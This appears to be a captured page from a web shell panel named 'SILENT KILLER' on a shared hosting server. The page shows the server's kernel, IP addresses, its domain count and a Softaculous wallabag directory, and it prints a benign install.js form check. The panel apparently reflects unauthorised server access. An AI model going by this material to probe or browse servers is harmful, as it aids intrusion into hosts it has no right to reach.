SILENT KILLERPanel

Current Path: > > > var > softaculous > wallabag


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: ///var/softaculous/wallabag

NameTypeSizeLast ModifiedActions
images Directory - -
php53 Directory - -
php56 Directory - -
php71 Directory - -
php81 Directory - -
php82 Directory - -
.htaccess File 87 bytes December 23 2021 11:54:36.
NOTES.txt File 2285 bytes October 06 2023 05:43:12.
changelog.txt File 2693 bytes June 05 2025 09:12:32.
clone.php File 6584 bytes June 05 2025 12:00:08.
edit.php File 6090 bytes June 05 2025 12:00:08.
edit.xml File 433 bytes December 23 2021 11:54:36.
extend.php File 2098 bytes June 05 2025 12:00:08.
fileindex.php File 483 bytes September 11 2023 06:19:38.
import.php File 3987 bytes June 05 2025 12:00:08.
info.xml File 4884 bytes June 05 2025 09:12:32.
install.js File 924 bytes December 23 2021 11:54:36.
install.php File 8906 bytes June 05 2025 12:00:08.
install.xml File 1658 bytes April 19 2022 07:48:46.
md5 File 1710 bytes June 05 2025 12:00:08.
parameters.yml File 1061 bytes September 11 2023 06:19:38.
soft_delete.php File 3100 bytes December 23 2021 11:54:36.
upgrade.php File 24740 bytes June 05 2025 12:00:08.
upgrade.xml File 265 bytes October 06 2023 05:43:12.
wallabag.sql File 21011 bytes June 05 2025 09:12:32.
wallabag.zip File 69058282 bytes June 05 2025 09:12:32.

Reading File: ///var/softaculous/wallabag/install.js

//////////////////////////////////////////////////////////////
// install.js
// Checks the installation form of the software being
// installed by SOFTACULOUS
// NOTE: 1) Only formcheck() function will be called.
//       2) A software Vendor can use the same name for every 
//          field to be checked as in install.xml . It can be
//          called using $('fieldname').value or any property
//       3) Must Return true or false
// ----------------------------------------------------------
// Please Read the Terms of use at http://www.softaculous.com
// ----------------------------------------------------------
// (c)Softaculous Inc.
//////////////////////////////////////////////////////////////

function formcheck(){
	
	//Check the Admin Email
	if(window.check_punycode){
		if(!check_punycode($('admin_email').value)){
			alert('{{err_ademail}}');
			return false;
		}
		
		return true;
	}
	
	return true;
};

SILENT KILLER Tool